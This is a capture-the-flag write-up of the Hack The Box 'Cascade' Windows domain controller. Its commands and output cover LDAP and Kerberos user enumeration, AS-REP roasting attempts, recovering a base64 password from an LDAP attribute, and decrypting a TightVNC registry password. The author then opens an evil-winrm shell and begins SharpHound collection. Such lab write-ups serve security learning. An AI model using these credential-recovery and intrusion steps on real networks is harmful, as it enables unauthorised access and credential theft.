This is a windows machine from hack the box.
Nmap scan
└─$ nmap -sV -sC -oA cascade 10.10.10.182
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:46 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.97 seconds
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ nmap -sV -sC -oA cascade 10.10.10.182 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:47 EDT
Nmap scan report for 10.10.10.182
Host is up (0.38s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-11 09:48:13Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.22 seconds
┌──(kali㉿kali)-[~/HTB/cascade]
└─$
crackmapexec
└─$ crackmapexec smb 10.10.10.182 -u "" up ""
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/HTB/cascade]
rpcclient
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/HTB/cascade]
└─$
add the cascade.local to hosts file
GNU nano 7.2 /etc/hosts *
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
Do an ldap search
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
CascGuest
CASC-DC1$
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade>
output the users to a text file and include administrator
administrator
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade>
use kerbrute to see which users are valid. They are all valid
kali@kali ~/H/cascade> ./kerbrute userenum --dc 10.10.10.182 -d cascade.LOCAL users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/11/23 - Ronnie Flathers @ropnop
2023/09/11 06:36:48 > Using KDC(s):
2023/09/11 06:36:48 > 10.10.10.182:88
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:03 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:03 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:04 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:04 > Done! Tested 15 usernames (12 valid) in 15.881 seconds
kali@kali ~/H/cascade>
We loop this filre and checke which we can get the hash but we get nothing
```bash
└─$ while read -r user; do
./GetNPUsers.py cascade.LOCAL/$user -no-pass -dc-ip 10.10.10.182
done < /home/kali/HTB/cascade/users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
enume4linux gives nothing
kali@kali ~/H/cascade> enum4linux -S 10.10.10.182
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 11 06:45:06 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.182 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.10.182 )===================================
[+] Server 10.10.10.182 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.182 )================================
Domain Name: CASCADE
Domain Sid: S-1-5-21-3332504370-1206983947-1165150453
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.10.182 )=================================
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.182
enum4linux complete on Mon Sep 11 06:45:30 2023
kali@kali ~/H/cascade>
Tried this
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.182 -request 'cascade.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
No entries found!
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
We going to try and brute force to get password
checking password policy
└─$ crackmapexec smb 10.10.10.182 --pass-pol
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] Dumping password info for domain: CASCADE
SMB 10.10.10.182 445 CASC-DC1 Minimum password length: 5
SMB 10.10.10.182 445 CASC-DC1 Password history length: None
SMB 10.10.10.182 445 CASC-DC1 Maximum password age: Not Set
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Password Complexity Flags: 000000
SMB 10.10.10.182 445 CASC-DC1 Domain Refuse Password Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Store Cleartext: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Lockout Admins: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Clear Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Anon Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Complex: 0
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Minimum password age: None
SMB 10.10.10.182 445 CASC-DC1 Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Locked Account Duration: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Account Lockout Threshold: None
SMB 10.10.10.182 445 CASC-DC1 Forced Log off Time: Not Set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
— SMB 10.10.10.182 445 CASC-DC1 Account Lockout Threshold: None
Brute forcing will require us creating a short list
Going back to ldap search
ldap search listing all objects —
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr
1109 dSCorePropagationData:
518 objectClass:
263 #
254
249 dn:
226 whenCreated:
226 whenChanged:
226 uSNCreated:
226 uSNChanged:
226 objectGUID::
226 objectCategory:
Found custom object called — cascadeLegacyPwd
1 C-DC1,OU=Domain
1 cascadeLegacyPwd:
Doing an Ldapsearch to get username and this custom object
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName cascadeLegacyPwd | awk -F ': ' '/sAMAccountName/ { username=$2 } /cascadeLegacyPwd/ { print username ": " $2 }'
sAMAccountName cascadeLegacyPwd : sAMAccountName cascadeLegacyPwd
r.thompson: clk0bjVldmE=
kali@kali ~/H/cascade>
This seems to be base64 since it has the = at the end
Decoding this with use of chatGPT we get clk4n5eva and the command to decode this is “echo “clk0bjVldmE=” | base64 -d. actually chatGPT was wrong
kali@kali ~/H/cascade> echo "clk0bjVldmE=" | base64 -d
rY4n5eva⏎ kali@kali ~/H/cascade>
”
we try crackmapexec
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p clk4n5eva
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:clk4n5eva
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:rY4n5eva
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
we read the data folder after connecting with smbclient and get some files
└─$ smbclient //10.10.10.182/data -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
cd
6553343 blocks of size 4096. 1624901 blocks available
smb: \> cd Contractors
smb: \Contractors\> ls
NT_STATUS_ACCESS_DENIED listing \Contractors\*
smb: \Contractors\> cd ../
smb: \> cd Finance
smb: \Finance\> ls
NT_STATUS_ACCESS_DENIED listing \Finance\*
smb: \Finance\> cd ../
smb: \> cd IT
smb: \IT\> ls
. D 0 Tue Jan 28 13:04:51 2020
.. D 0 Tue Jan 28 13:04:51 2020
Email Archives D 0 Tue Jan 28 13:00:30 2020
LogonAudit D 0 Tue Jan 28 13:04:40 2020
Logs D 0 Tue Jan 28 19:53:04 2020
Temp D 0 Tue Jan 28 17:06:59 2020
6553343 blocks of size 4096. 1624901 blocks available
smb: \IT\> get Email Archives
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Email
smb: \IT\> cd Email Archives
cd \IT\Email\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\> get LogonAudit
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \IT\LogonAudit
smb: \IT\> cd LogonAudit
smb: \IT\LogonAudit\> ls
. D 0 Tue Jan 28 13:04:40 2020
.. D 0 Tue Jan 28 13:04:40 2020
6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\LogonAudit\> cd ../
smb: \IT\> cd Logs
smb: \IT\Logs\> ls
. D 0 Tue Jan 28 19:53:04 2020
.. D 0 Tue Jan 28 19:53:04 2020
Ark AD Recycle Bin D 0 Fri Jan 10 11:33:45 2020
DCs D 0 Tue Jan 28 19:56:00 2020
6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\Logs\> cd Ark AD Recycle Bin
cd \IT\Logs\Ark\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\Logs\> cd "Ark AD Recycle Bin"
smb: \IT\Logs\Ark AD Recycle Bin\> ls
. D 0 Fri Jan 10 11:33:45 2020
.. D 0 Fri Jan 10 11:33:45 2020
ArkAdRecycleBin.log A 1303 Tue Jan 28 20:19:11 2020
6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Logs\Ark AD Recycle Bin\> get ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \IT\Logs\Ark AD Recycle Bin\> cd ../
smb: \IT\Logs\> cd ../
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
. D 0 Tue Jan 28 13:00:30 2020
.. D 0 Tue Jan 28 13:00:30 2020
Meeting_Notes_June_2018.html An 2522 Tue Jan 28 13:00:12 2020
6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.5 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \IT\Email Archives\>
reading the contet of the email
└─$ cat Meeting_Notes_June_2018.html
<html>
<body lang=EN-GB link=blue vlink=purple style='tab-interval:36.0pt'>
<div class=WordSection1>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>From:<span style='mso-tab-count:
1'>���������������������������������������� </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Steve Smith
<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>To:<span style='mso-tab-count:
1'>���������������������������������������������� </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>IT (Internal)<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Sent:<span style='mso-tab-count:
1'>������������������������������������������ </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>14 June 2018 14:07<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Subject:<span
style='mso-tab-count:1'>������������������������������������ </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Meeting Notes<o:p></o:p></span></p>
<p><o:p> </o:p></p>
<p>For anyone that missed yesterday�s meeting (I�m looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the �Best GPO� competition will be
announced on Friday so get your submissions in soon.</p>
<p class=MsoNormal><o:p> </o:p></p>
<p class=MsoNormal>Steve</p>
</div>
</body>
</html>
We see username TempAdmin
try get a hash but no luck.also tried with user Ben
kali@kali ~/H/cascade> cd /usr/share/doc/python3-impacket/examples
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/TempAdmin
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate TempAdmin, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/S.smith
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate S.smith, getting its TGT
[-] User S.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/Ben
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate Ben, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples>
We also look at the VNC file that we got from one of the folders
smb: \> ls
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
cd
6553343 blocks of size 4096. 1624895 blocks available
smb: \> cd IT
smb: \IT\> ls
. D 0 Tue Jan 28 13:04:51 2020
.. D 0 Tue Jan 28 13:04:51 2020
Email Archives D 0 Tue Jan 28 13:00:30 2020
LogonAudit D 0 Tue Jan 28 13:04:40 2020
Logs D 0 Tue Jan 28 19:53:04 2020
Temp D 0 Tue Jan 28 17:06:59 2020
cd
6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\> cd Temp
smb: \IT\Temp\> ls
. D 0 Tue Jan 28 17:06:59 2020
.. D 0 Tue Jan 28 17:06:59 2020
r.thompson D 0 Tue Jan 28 17:06:53 2020
s.smith D 0 Tue Jan 28 15:00:01 2020
6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> ls
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\s.smith\> get VNC Install.reg
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \IT\Temp\s.smith\>
thhe VNC file
└─$ cat VNC\ Install.reg
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
┌──(kali㉿kali)-[~/HTB/cascade]
└─$
ChatGPT gives this as asci – kÏ*KnZÊ which doesnt look like a password
From chatGPT
The value you provided seems to be from a registry key associated with TightVNC. TightVNC stores its passwords in the Windows Registry, and they're saved in a hashed (obfuscated) form, not plain text.
Given `"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f`, this looks like the registry entry for the TightVNC password. The hexadecimal value isn't the password itself but rather an encoded or hashed representation of it.
To get the actual password, you would typically need to decode or decrypt the hash, which requires specialized tools or scripts. There have been a few tools and scripts written for this purpose over the years. One of the well-known tools for this is `vncpwd`, which can decrypt VNC passwords stored in this way.
If you have access to the tool, you can use the extracted hex values to retrieve the password. Otherwise, there are also scripts available online in various programming languages that accomplish the same thing.
Keep in mind that interpreting or accessing information without proper authorization is illegal and unethical. Always make sure to have the necessary permissions when working with sensitive data or systems.
Got a decrypter — https://github.com/jeroennijhof/vncpwd
Afer running the tool, i was getting bad output
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.txt
Password: (�����
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$
Checking with chatGPT , it recommended the process
echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin
./vncpwd vnc_hash.bin
and we get the password
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.bin
Password: sT333ve2
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$
run crackmapexec
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
using evil-winrm and we get the hash – 795b883bce48e25112c2183f92466
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> ls
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/11/2023 10:47 AM 34 user.txt
-a---- 2/4/2021 4:24 PM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat users.txt
Cannot find path 'C:\Users\s.smith\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\s.smith\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat user.txt
795b883bce48e25112c2183f92466
Privesc
copy sharphound to cascade folder
┌──(kali㉿kali)-[~/Downloads]
└─$ cd Bloodhound_3
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
BloodHound-3.0.5 BloodHound-3.0.5.zip BloodHound-linux-x64 'BloodHound-linux-x64(1).zip'
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
appveyor.yml Ingestors package-lock.json webpack.config.development.js
BloodHoundExampleDB.db LICENSE-3RD-PARTY.md README.md webpack.config.production.js
deploy.sh LICENSE.md renderer.js
docs main.js server.js
index.html package.json src
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds SharpHound.exe SharpHound.ps1
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SSharpHound.exe /home/kali/HTB/cascade
cp: cannot stat 'SSharpHound.exe': No such file or directory
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SharpHound.exe /home/kali/HTB/cascade
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
upload sharphound to our machine and run it and the download the zip back to kali
┌──(kali㉿kali)-[~/HTB/cascade]
